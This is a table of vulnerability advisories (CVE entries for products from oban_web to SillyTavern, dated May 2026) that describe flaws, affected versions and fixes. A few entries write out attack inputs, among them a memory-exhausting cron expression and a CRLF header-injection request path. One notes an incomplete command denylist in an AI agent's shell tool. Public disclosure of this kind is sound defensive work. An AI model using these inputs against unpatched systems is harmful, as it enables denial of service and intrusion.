| oban-bg--oban_web | Uncontrolled Resource Consumption vulnerability in oban-bg oban_web ('Elixir.Oban.Web.CronExpr' modules) allows memory exhaustion via unbounded cron range expansion. An attacker with access to schedule cron jobs can submit a malicious cron expression such as "0 0 1-100000000 * *". When a user with dashboard access views the cron job list, 'Elixir.Oban.Web.CronExpr':describe/1 is called to render the expression. parse_range/1 parses both range endpoints via Integer.parse/1 with no bounds check, and the downstream helpers expand_dom_parts/1 and expand_dow_parts/1 materialise the range eagerly via Enum.to_list/1, causing allocation of ~2.4 GB and stalling or crashing the BEAM node. A sibling helper extract_dom_values already validates range bounds, but the expansion helpers do not. This issue affects oban_web: from 2.12.0 before 2.12.5. | 2026-05-26 | not yet calculated | CVE-2026-48593 | https://github.com/oban-bg/oban_web/security/advisories/GHSA-6xh2-93p9-vqh4 https://cna.erlef.org/cves/CVE-2026-48593.html https://osv.dev/vulnerability/EEF-CVE-2026-48593 https://github.com/oban-bg/oban_web/commit/9998b7e284e02fdd4645dd6231760038e63b584d |
| OnlyOffice--DocSpace | An Insecure Direct Object Reference (IDOR) vulnerability was discovered in ONLYOFFICE DocSpace before 3.2.1. The flaw exists in multiple REST API endpoints. This allows authenticated users with low-level permissions (User or Guest) to retrieve sensitive information, such as the Owner's unique identifier (ID) and profile information, which should only be accessible to administrators. | 2026-05-26 | not yet calculated | CVE-2026-38587 | https://github.com/ONLYOFFICE/DocSpace/blob/master/CHANGELOG.md#security |
| OpenRapid--RapidCMS v1.3.1 | OpenRapid RapidCMS v1.3.1 was discovered to contain an authentication bypass in the /template/default/menu.php component. This vulnerability is exploited via injecting a crafted SQL payload into the name cookie parameter. | 2026-05-27 | not yet calculated | CVE-2026-38930 | http://openrapid.com http://rapidcms.com https://moworn.github.io/post/cve-2026-38930/ |
| openreplay--openreplay | OpenReplay is a self-hosted session replay suite. Prior to 1.26.0, there is a cross-tenant IDOR on feature-flag and assist-stats routes via {project_id} case mismatch. ProjectAuthorizer.__call__ (OSS api/auth/auth_project.py:14-38 and EE ee/api/auth/auth_project.py:14-46) only runs projects.is_authorized(project_id, tenant_id, user_id) + projects.get_project(tenant_id, project_id) when self.project_identifier == "projectId" (camelCase). For EE multi-tenant, feature-flag queries only filter on project_id, never tenant_id. Any authenticated user in tenant A can read/update/delete feature-flag rows belonging to tenant B by iterating the sequential integer project_id + feature_flag_id. OSS is single-tenant by design ({"errors":["tenants already registered"]} on second signup), so there is no cross-tenant impact there. This vulnerability is fixed in 1.26.0. | 2026-05-28 | not yet calculated | CVE-2026-45297 | https://github.com/openreplay/openreplay/security/advisories/GHSA-5m23-rcj4-cgjx |
| OpenSolution--QuickCMS | QuickCMS allows a user's session identifier to be set before authentication. The value of this session ID stays the same after authentication. This behaviour enables an attacker to fix a session ID for a victim and later hijack the authenticated session. This issue was fixed in a patch to version 6.8 published on 15.05.2026, deployments without this patch are still vulnerable. | 2026-05-29 | not yet calculated | CVE-2026-33384 | https://cert.pl/posts/2026/05/CVE-2026-33384/ https://opensolution.org/home.html |
| OpenSolution--QuickCMS | QuickCMS is vulnerable to Cross-Site Scripting (XSS) through its insecure HTTP-based plugin-fetching mechanism. A malicious attacker can perform a Man-in-the-Middle (MITM) attack by impersonating the opensolution.org server and serving arbitrary HTML or JavaScript at the plugin list endpoint. When a user accesses the plugin page, the malicious content is automatically fetched, rendered, and executed. This issue was fixed in a patch to version 6.8 published on 15.05.2026, deployments without this patch are still vulnerable. | 2026-05-29 | not yet calculated | CVE-2026-33386 | https://cert.pl/posts/2026/05/CVE-2026-33384/ https://opensolution.org/home.html |
| OpenStack--Neutron | In OpenStack Neutron before 28.0.1, the tagging controller enforces plural policy action names on single-tag write operations while the defined policy rules use singular names. The mismatched names evaluate as allowed under the default policy, permitting a project reader to create and update tags on same-project resources. Deployments running Neutron 26.0.0 or later are affected. | 2026-05-28 | not yet calculated | CVE-2026-49299 | https://bugs.launchpad.net/bugs/2150132 https://review.opendev.org/c/openstack/neutron/+/989099 https://www.openwall.com/lists/oss-security/2026/05/28/8 |
| OpenStack--Swift | In OpenStack Swift before 2.36.2 and 2.37.2, s3api middleware enters an infinite loop when processing a truncated aws-chunked PUT request body. The StreamingInput class repeatedly appends an empty buffer and re-reads, causing the proxy-server worker handling the request to become permanently unresponsive with increasing CPU and memory consumption. An authenticated attacker can systematically exhaust all proxy-server workers, resulting in denial of service. The defect was introduced in Swift 2.36.0. | 2026-05-27 | not yet calculated | CVE-2026-49017 | https://bugs.launchpad.net/bugs/2152205 https://review.opendev.org/c/openstack/swift/+/987957 https://review.opendev.org/c/openstack/swift/+/988093 |
| OpenVPN Inc--OpenVPN Connect | Privilege escalation via the background service of OpenVPN Connect 3.5.1 through 3.8.1 on macOS allows attackers to execute arbitrary commands with elevated privileges via a local IPC channel. | 2026-05-26 | not yet calculated | CVE-2026-9560 | https://openvpn.net/connect-docs/macos-release-notes.html |
| OutSystems--Lifetime | OutSystems Lifetime is vulnerable to an Authorization Bypass Through User-Controlled Key vulnerability in the ApplicationID parameter. Any authenticated user can read the Change Log containing actions performed by other users, as well as the application name of any application. This issue was fixed in OutSystems Lifetime version 11.28.2.3955. | 2026-05-25 | not yet calculated | CVE-2026-40127 | https://cert.pl/en/posts/2026/05/CVE-2026-40126/ https://www.outsystems.com/downloads/ScreenDetails?ReleaseId=22953&MajorVersion=11&ComponentName=LifeTime |
| Pboot--CMS v3.2.11 | PbootCMS v.3.2.11 contains a code injection vulnerability in its site configuration functionality. | 2026-05-26 | not yet calculated | CVE-2026-36239 | http://pbootcms.com http://hunan.com https://github.com/TazmiDev/CVE-2026-36239 |
| picoclaw--ExecTool | picoclaw <=v0.1.2 and earlier is vulnerable to OS command injection via the ExecTool component (pkg/tools/shell.go). The guardCommand() function attempts to restrict shell command execution using a denylist of 8 regular expressions, but the denylist is incomplete. | 2026-05-27 | not yet calculated | CVE-2026-36045 | https://github.com/sipeed/picoclaw/releases/tag/v0.1.2 https://gist.github.com/NucleiAv/41899be6266a9813840301577792ed68 |
| PMQS--IO::Compress | IO::Compress versions from 2.207 before 2.220 for Perl ship a zipdetails CLI tool that crashes with undefined subroutine on Info-ZIP Unix Extra Field with 8-byte UID or GID. When decode_ux() in bin/zipdetails handles an Info-ZIP Unix Extra Field (tag 0x7875) with UID Size or GID Size set to 8, causing zipdetails to decode an 8-byte UID or GID value, it dispatches through decodeLitteEndian(), which calls a misnamed helper unpackValueQ. The actual function defined in the same file is unpackValue_Q (with underscore); the call raises 'Undefined subroutine &main::unpackValueQ' and the script exits with status 255. Library callers of IO::Compress and IO::Uncompress are not affected; the defect is in the bundled CLI tool. | 2026-05-27 | not yet calculated | CVE-2026-48961 | https://github.com/pmqs/IO-Compress/commit/33c89d03d6e746ed2ead4f2f6570d47864c61bc7.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| PMQS--IO::Compress | IO::Compress versions before 2.220 for Perl can execute arbitrary code in File::GlobMapper via an attacker-controlled output glob. _parseOutputGlob() wraps the caller-supplied output glob string in double quotes and stores it in the parser state; _getFiles() then runs the stored expression through eval STRING. A literal double quote in the output glob closes the dquote wrapper, and the characters that follow are evaluated as Perl. Arbitrary Perl in the output glob executes at the calling process's privilege. | 2026-05-27 | not yet calculated | CVE-2026-48962 | https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| PMQS--IO::Uncompress::Unzip | IO::Uncompress::Unzip versions before 2.215 for Perl propagate an uncaught exception when parsing a zip header with a malformed DOS date. _dosToUnixTime() decodes the local-file-header last-modification date field and calls Time::Local::timelocal() without an eval guard. A header whose date field decodes to an out-of-range month, day, or hour causes timelocal() to die. The exception propagates out of IO::Uncompress::Unzip->new($file) where callers expect undef plus $UnzipError. | 2026-05-27 | not yet calculated | CVE-2025-15649 | https://github.com/pmqs/IO-Compress/commit/fd28c1d2374eee9811f6d0c5bddc0957abdf1da8.patch https://github.com/pmqs/IO-Compress/issues/65 https://metacpan.org/release/PMQS/IO-Compress-2.215/changes |
| PMQS--IO::Uncompress::Unzip | IO::Uncompress::Unzip versions before 2.220 for Perl allow CPU exhaustion via a per-byte read loop in fastForward. fastForward() compares length $offset (the digit count of the offset, 1 to 19) against the chunk size $c instead of $offset itself, so $c shrinks from 16 KiB to 1-19 bytes per iteration. Extracting a named entry from an attacker-supplied zip via IO::Uncompress::Unzip->new($zip, Name => $target) drives a per-byte read loop scaling with the entry's compressed size, up to the non-Zip64 4 GiB cap. | 2026-05-27 | not yet calculated | CVE-2026-48959 | https://github.com/pmqs/IO-Compress/commit/68db44076f4c1a86a2ffe53a958eac6cabaf72e2.patch https://metacpan.org/release/PMQS/IO-Compress-2.220/changes |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, the Docker plugin management endpoints (/plugins/*) were not registered with a handler, so standard users with endpoint access could call privileged plugin operations - including installing and enabling plugins - directly against the underlying Docker daemon. The vulnerability is exposed when a non-admin Portainer user (Standard User role, or any role granted endpoint-level access) has been given access to a Docker endpoint via Portainer RBAC. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44848 | https://github.com/portainer/portainer/security/advisories/GHSA-rrmm-9v76-h3p4 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer enforces seven EndpointSecuritySettings restrictions that administrators configure to restrict the container configurations non-admin users can launch: privileged mode, host PID namespace, device mapping, capabilities, sysctls, security-opt (Seccomp / AppArmor), and bind mounts. These restrictions are enforced on the standard container creation path, but several of them are not applied on the Docker Swarm service API. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44849 | https://github.com/portainer/portainer/security/advisories/GHSA-5fxq-qcf3-244w |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer supports deploying stacks from Git repositories. When a Git-backed stack is created or updated, Portainer clones the repository using go-git v5, which translates Git blob entries with mode 0o120000 (symlink) into real OS symlinks on the host filesystem via os.Symlink. The only entry blocked from becoming a symlink is .gitmodules; every other path is created as a symlink without validation. Portainer's GET /api/stacks/{id}/file endpoint then reads the stack entry point with os.ReadFile, which follows OS symlinks transparently. A repository containing docker-compose.yml as a symlink to an arbitrary filesystem path causes the symlink target's contents to be returned verbatim in the HTTP response. Any authenticated user with rights to create or update a Git-backed stack - the default configuration in Portainer CE - can read arbitrary files accessible to the Portainer process. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44881 | https://github.com/portainer/portainer/security/advisories/GHSA-rpgq-m5fp-32wr |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer's authentication middleware accepts JWT bearer tokens passed as the ?token=<JWT> URL query parameter on any authenticated API endpoint, in addition to the standard Authorization: Bearer header. URLs are recorded in reverse-proxy access logs, browser history, and HTTP Referer headers on outbound navigation, so any JWT passed this way can be harvested by anyone with access to those logs or by an external site the user subsequently visits. A leaked token grants the full privileges of the user it was issued to, until the token expires (default 8 hours, configurable). The ?token= parameter was used by Portainer's browser-based container attach, exec, and pod shell features, so any user with exec or attach rights on a container was exposed - not only administrators. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | not yet calculated | CVE-2026-44883 | https://github.com/portainer/portainer/security/advisories/GHSA-jvp4-q659-95mj |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8 and 2.39.1, a missing authorization vulnerability in the Custom Template file endpoint (GET /api/custom_templates/{id}/file) allows any authenticated user to read the file content of any custom template by enumerating sequential integer IDs, bypassing Resource Control access restrictions. Template files may contain environment-specific values such as connection strings, API tokens, or registry credentials that administrators would not expect standard users to read. This vulnerability is fixed in 2.33.8 and 2.39.1. | 2026-05-28 | not yet calculated | CVE-2026-44884 | https://github.com/portainer/portainer/security/advisories/GHSA-cqpq-2fgr-8mvc |
| Portainer--Portainer Community Edition | Insecure default settings of Portainer CE grant regular (non-admin) users privileges that allow host filesystem access and host-level code execution. An authenticated non-administrative user with endpoint access can exploit these settings to read host files or obtain root-equivalent access on the host. | 2026-05-28 | not yet calculated | CVE-2026-33590 | https://intwave.com/blog/2026/02/26/improving-portainer-security.html https://github.com/portainer/portainer/commit/ac8fa7672e732b44b970c9eaf928eddd2c68796c https://github.com/portainer/portainer/commit/3e2fdb1891e81a8e4c5c8beb60e45f07c8ecae52 |
| pretix--pretix | When creating an export through the pretix API, API clients are returned a UUID value for their export job (a long, random string like 35742818-c375-4d15-839f-d49aecce94d6). Using this UUID, the API client can then request the actual file for download. The same kind of UUID is used in other places in pretix when temporary files are generated for internal use or download. One remaining API endpoint, however, wrongfully did not verify if the UUID used for download actually belongs to a file that is supposed to be downloadable and belongs to the correct user. In reality, this is hard to exploit because an attacker would need to have access to a valid UUID for the file they desire, which is unlikely to happen without a separate security problem giving them access to logs etc. | 2026-05-27 | not yet calculated | CVE-2026-9712 | https://pretix.eu/about/en/blog/20260527-release-2026-4-2/ |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. From 2.49.0 to before 3.5.3 and 3.11.3, in the Prometheus server's legacy web UI (enabled via the command-line flag --enable-feature=old-ui), the histogram heatmap chart view does not escape le label values when inserting them into the HTML for use as axis tick mark labels. An attacker who can inject crafted metrics can execute JavaScript in the browser of any Prometheus user who views the metric in the heatmap chart UI. This vulnerability is fixed in 3.5.3 and 3.11.3. | 2026-05-26 | not yet calculated | CVE-2026-44903 | https://github.com/prometheus/prometheus/security/advisories/GHSA-fw8g-cg8f-9j28 https://github.com/prometheus/prometheus/commit/38f23b9075ced1de2b82d2dad8b2bebb1ecd5b7d |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.0, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires extracting text in layout mode with large character offsets. This vulnerability is fixed in 6.12.0. | 2026-05-28 | not yet calculated | CVE-2026-48155 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-cj93-chg6-vgv8 https://github.com/py-pdf/pypdf/pull/3790 https://github.com/py-pdf/pypdf/releases/tag/6.12.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.0, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires cross-reference streams with /W [0 0 0] values and large /Size values. This vulnerability is fixed in 6.12.0. | 2026-05-28 | not yet calculated | CVE-2026-48156 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-248m-82v9-q6g6 https://github.com/py-pdf/pypdf/pull/3791 https://github.com/py-pdf/pypdf/releases/tag/6.12.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to 6.12.1, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing large XMP metadata, possibly with lots of unnecessary elements. This vulnerability is fixed in 6.12.1. | 2026-05-28 | not yet calculated | CVE-2026-48735 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-wjqc-6w8f-h24c https://github.com/py-pdf/pypdf/pull/3796 https://github.com/py-pdf/pypdf/releases/tag/6.12.1 |
| QOS.CH Sarl--logback | Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection, albeit heavily restricted. More precisely, an attacker able to influence serialized data sent to SimpleSocketServer or SimpleSSLSocketServer can instantiate objects from classes in the java.lang and java.util packages that are not explicitly blocked. Although deserialization is heavily restricted by HardenedObjectInputStream and no practical way to achieve remote code execution or significant privilege escalation has been identified, this issue constitutes a bypass of the intended security restrictions. This issue affects logback: through 1.5.32 inclusive. | 2026-05-28 | not yet calculated | CVE-2026-9828 | https://logback.qos.ch/news.html#1.5.33 |
| rabbitmq--rabbitmq-server | RabbitMQ is a messaging and streaming broker. From 4.2.0 to before 4.2.4, RabbitMQ's MQTT plugin allows for topic-level authorization using regular expressions with variable substitution. Administrators can create patterns such as ^{client_id}-sensors$ to restrict user access to topics that include their client ID. However, the client_id is provided by the user in the MQTT CONNECT packet and is inserted into the regex pattern without escaping special regex characters. This flaw enables an authenticated MQTT user to inject regex operators to bypass authorization. This vulnerability is fixed in 4.2.4 and 4.3.0. | 2026-05-27 | not yet calculated | CVE-2026-44838 | https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-x866-xp2g-cx8v |
| rabbitmq--rabbitmq-server | RabbitMQ is a messaging and streaming broker. From 3.7.0 to before 4.1.2 and 4.0.13, This vulnerability is fixed in 4.1.2 and 4.0.13. | 2026-05-27 | not yet calculated | CVE-2026-44839 | https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-fh5r-jpm3-fjwp https://github.com/rabbitmq/rabbitmq-server/commit/7f54319279d1ece161ae0b4cdc6f0e58a4045eb5 |
| randombit--botan | Botan is a C++ cryptography library. Prior to 3.12.0, certain patterns of indefinite length encodings in BER data could cause quadratic behavior in the parser, resulting in a denial of service. Such BER encodings were accepted even in structures which are required to be encoded as DER, which prohibits indefinite length encodings. This vulnerability is fixed in 3.12.0. | 2026-05-27 | not yet calculated | CVE-2026-44378 | https://github.com/randombit/botan/security/advisories/GHSA-7q2v-3g27-6g3j |
| Raynet--Rvia | Command injection in Raynet rvia 12.6.4392.49-amd64.deb allows adversaries to execute commands via getconfig, and upload through the URL argument, and oracle through the -o flag. The Supplier's perspective is that this is caused by Argument Injection in the find command query in rvia 12.6.4392.49. This is an arbitrary code execution flaw caused by an incorrectly constructed find command. The application actively searches for a Java executable by using search criteria that are not properly terminated or sanitized. By constructing a crafted directory path that satisfies the malformed search criteria, an attacker can trick the application into executing arbitrary Java code. This differs from standard PATH manipulation because it stems from the application's internal search logic. Specifically, a local attacker can create a crafted directory structure and path that satisfies an improperly terminated find query used by the application to locate a Java runtime. | 2026-05-27 | not yet calculated | CVE-2025-69600 | https://support.raynet.de/hc/en-us/articles/19518792826132-RVY200865-RayVentory-12-6 https://github.com/Wise-Security/CVE-2025-69600 |
| Raynet--Rvia | Command injection in Raynet rvia version 12.6 Update 8 and previous versions allows adversaries to execute arbitrary code via a crafted path that matches the improperly terminated search criteria of rvia's Java search using the find command. | 2026-05-27 | not yet calculated | CVE-2026-38945 | https://support.raynet.de/ https://github.com/Wise-Security/CVE-2026-38945 |
| Remote Spark (https://www.remotespark.com/)--SparkView | Path traversal vulnerability in Remote Spark (https://www.Remotespark.Com/) SparkView allows reading and writing arbitrary files in all directories as root. This leads to RCE. The affected component is the RDP drive redirection. Depending on implementation, the vulnerability can be exploited by an unauthenticated attacker. This issue affects SparkView: before build 1127. | 2026-05-29 | not yet calculated | CVE-2026-8326 | https://www.remotespark.com/view/new.html |
| Responsive File Manager--Responsive File Manager | An issue in Responsive File Manager version 9.14.0 allows a remote attacker to execute arbitrary code via the force_download.php component. | 2026-05-28 | not yet calculated | CVE-2026-37266 | https://www.responsivefilemanager.com/ https://csacyber.com/blog/responsive-filemanager-version-9-14-0-multiple-vulnerabilities-cve-2026-37266 |
| Rocket.Chat--Rocket.Chat | The Rocket.Chat DDP method autoTranslate.translateMessage in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.5, <7.13.8, and <7.10.12 accepts a client-supplied IMessage object and passes it directly to translateMessage() without checking Meteor.userId() or verifying room membership. Any authenticated DDP user can read the content of any message by ID from any room (private channels, DMs, E2EE rooms) by calling this method. | 2026-05-28 | not yet calculated | CVE-2026-32995 | https://hackerone.com/reports/3734326 https://github.com/RocketChat/Rocket.Chat/pull/40528 |
| RRWO--Mojolicious::Plugin::Statsd | Mojolicious::Plugin::Statsd versions through 0.04 for Perl allowed metric injections. The metric names and set values were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Version 0.06 changes the module from being a statsd client to using a separate statsd client. It defaults to using a version of Net::Statsd::Tiny that fixes a similar issue (CVE-2026-46720). | 2026-05-26 | not yet calculated | CVE-2026-46740 | https://metacpan.org/release/RRWO/Mojolicious-Plugin-Statsd-0.06/changes https://github.com/robrwo/perl-Mojolicious-Plugin-Statsd/commit/f049156982a2c0b8050f173e24a04a29ddd64853.patch https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| RRWO--Plack::Middleware::Security::Common | Plack::Middleware::Security::Common versions before 0.13.1 for Perl did not block header injections in request paths. The header injection rule was ineffective at blocking header injections in the request paths unless they were double-encoded (for example, GET /path\r\nHTTP/1.1\r\nHost: secret.example.com). Note that it is unclear whether request paths with CRLF followed by additional headers would be blocked by reverse proxies, or how they would be processed by Plack-based servers. | 2026-05-28 | not yet calculated | CVE-2026-9658 | https://metacpan.org/release/RRWO/Plack-Middleware-Security-Simple-v0.13.1/changes |
| Rust Project--Cargo | Cargo incorrectly handled symlinks inside of crate tarballs downloaded from third-party registries, allowing a malicious crate to override the source code of another crate from the same registry. The severity of the vulnerability is **medium** for users of third-party registries. Users of crates.io are **not affected**, as crates.io forbids uploading crates containing any symlink. | 2026-05-25 | not yet calculated | CVE-2026-5223 | https://groups.google.com/g/rustlang-security-announcements/c/IB74S7Yksg8 https://blog.rust-lang.org/2026/05/25/cve-2026-5223/ https://github.com/rust-lang/cargo/pull/17031 |
| Rust--Cargo | Cargo between 1.68 and 1.96 incorrectly normalized the URLs of third-party registries using the sparse index protocol. If a hosting provider allowed multiple registries to be hosted with arbitrary names within the same domain, an attacker able to publish crates in a registry could obtain the credentials of other users of the same registry. The severity of the vulnerability is **low**, due to the extremely niche requirements needed to achieve the attack. | 2026-05-25 | not yet calculated | CVE-2026-5222 | https://groups.google.com/g/rustlang-security-announcements/c/SfUxOiIdY5s https://blog.rust-lang.org/2026/05/25/cve-2026-5222/ https://github.com/rust-lang/cargo/pull/17031 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, RustFS suffers from sensitive information leakage in log outputs. When the server is run with RUST_LOG=debug sensitive credentials including SessionToken (JWT), SecretAccessKey, and full JWT claims are printed in plaintext to the server logs. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45040 | https://github.com/rustfs/rustfs/security/advisories/GHSA-8cm2-h255-v749 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, crates/appauth/src/token.rs ships a 2048-bit RSA private key as a string constant named TEST_PRIVATE_KEY and uses it in production via parse_license() to "verify" license tokens. Because the key is embedded in every published source release and binary, anyone who can read the repository or extract it from the binary can mint arbitrary license tokens (any subject, any expiration). When the license Cargo feature is enabled, this defeats the entire license-enforcement mechanism. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45041 | https://github.com/rustfs/rustfs/security/advisories/GHSA-923g-jp7v-f97f |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, improper authorization in the UploadPartCopy operation allows copying objects across buckets without enforcing destination bucket restrictions on allowed copy sources. The implementation validates GetObject permission on the source bucket and PutObject on the destination bucket independently, but does not enforce any policy constraints on whether the destination bucket permits the specified copy source. This enables unauthorized cross-bucket data movement. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45042 | https://github.com/rustfs/rustfs/security/advisories/GHSA-wfxj-ph3v-7mjf |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, improper validation in the PUT /rustfs/admin/v3/import-iam endpoint allows a user with ImportIAMAction to create service accounts under arbitrary parent identities, including the root user (minioadmin). The endpoint accepts attacker-controlled parent, claims, accessKey, and secretKey values without enforcing privilege boundaries or sanitization. This enables privilege escalation to full administrative access using a persistent, attacker-defined credential. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-29 | not yet calculated | CVE-2026-45043 | https://github.com/rustfs/rustfs/security/advisories/GHSA-566f-q62r-wcr8 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the admin router explicitly whitelists /profile/cpu and /profile/memory from the authentication layer, allowing any unauthenticated HTTP client to invoke profiling handlers without credentials. On supported builds (e.g., glibc), the handler invokes a fixed 60-second CPU profiling operation (dump_cpu_pprof_for(Duration::from_secs(60))). This may result in significant CPU resource consumption per request and can potentially lead to denial of service when abused. Additionally, the handler returns the server's absolute filesystem path in the response body, resulting in information disclosure. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-45044 | https://github.com/rustfs/rustfs/security/advisories/GHSA-8784-9m7f-c6p6 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, when RUSTFS_CORS_ALLOWED_ORIGINS is unset, the RustFS S3 listener's ConditionalCorsLayer reflects any request Origin value back as Access-Control-Allow-Origin and also sets Access-Control-Allow-Credentials: true and Access-Control-Allow-Headers: * on responses, including preflight responses and error responses. This creates a permissive cross-domain policy with untrusted origins. A browser visiting an attacker-controlled page can issue credentialed cross-origin requests to a reachable RustFS deployment and read the response when the victim browser has ambient credentials for the RustFS origin, such as saved HTTP Basic Auth credentials, reverse-proxy SSO cookies, or TLS client certificates. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-46685 | https://github.com/rustfs/rustfs/security/advisories/GHSA-x5xv-223c-8vm7 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.2, the RustFS console endpoint GET /rustfs/console/license returns parsed license metadata without requiring authentication. The endpoint is registered on the console listener and returns JSON containing license information such as the license subject and expiration timestamp. Any client that can reach the console listener can query this endpoint without credentials. This vulnerability is fixed in 1.0.0-beta.2. | 2026-05-28 | not yet calculated | CVE-2026-47136 | https://github.com/rustfs/rustfs/security/advisories/GHSA-xp32-gxq2-3v52 |
| SailingLab--AppLock | SailingLab AppLock (aka com.alpha.applock) 4.3.8 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows - insecure navigation through exposed routes facilitates app control evasion [I.N.T.E.R.F.A.C.E] via advertisement or browser intents - an attacker can evade lockscreen verification and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68708 | https://play.google.com/store/apps/details?id=com.alpha.applock https://github.com/actuator/com.alpha.applock https://github.com/actuator/com.alpha.applock/blob/main/CVE-2025-68708 |
| SailingLab--Applock | SailingLab AppLock (aka com.alpha.applock) 4.3.8 for Android allows a local attacker to trigger arbitrary JavaScript execution via BrowserMainActivity, which accepts VIEW intents with javascript: URIs. This unsafe navigation path results in script execution and may allow UI spoofing or privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68709 | https://play.google.com/store/apps/details?id=com.alpha.applock https://github.com/actuator/com.alpha.applock https://github.com/actuator/com.alpha.applock/blob/main/CVE-2025-68709 |
| SHAY--perl | Perl versions through 5.43.10 have a heap buffer overflow when compiling regular expressions with a repeated fixed string on 32-bit builds. Perl_study_chunk in regcomp_study.c checked the size of the joined substring buffer in characters rather than bytes. For a quantified fixed substring with a large minimum count, the byte length mincount * l could overflow SSize_t, producing an undersized SvGROW allocation; the subsequent copy writes past the end of the buffer. A caller that compiles an attacker-controlled regular expression on a 32-bit perl build triggers a heap buffer overflow at compile time. | 2026-05-25 | not yet calculated | CVE-2026-8376 | https://github.com/Perl/perl5/commit/5e7f119eb2bb1181be908701f22bf7068e722f1c.patch |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, when fetch(url) throws, the code sends: res.status(500).send('Error occurred while trying to proxy to: ' + url + ' ' + error). The url value is attacker-controlled (req.params.url) and is not HTML-escaped before rendering. This vulnerability is fixed in 1.18.0. | 2026-05-29 | not yet calculated | CVE-2026-44651 | https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-xc4x-2452-5gc9 |
| SillyTavern--SillyTavern | SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. Prior to 1.18.0, corsProxyMiddleware forwards req.params.url directly into fetch(url, ...). It only blocks circular requests to its own host and does not enforce destination allowlist or private/loopback restrictions, enabling SSRF. This vulnerability is fixed in 1.18.0. | 2026-05-29 | not yet calculated | CVE-2026-44652 | https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-ccfq-2454-f5xw |
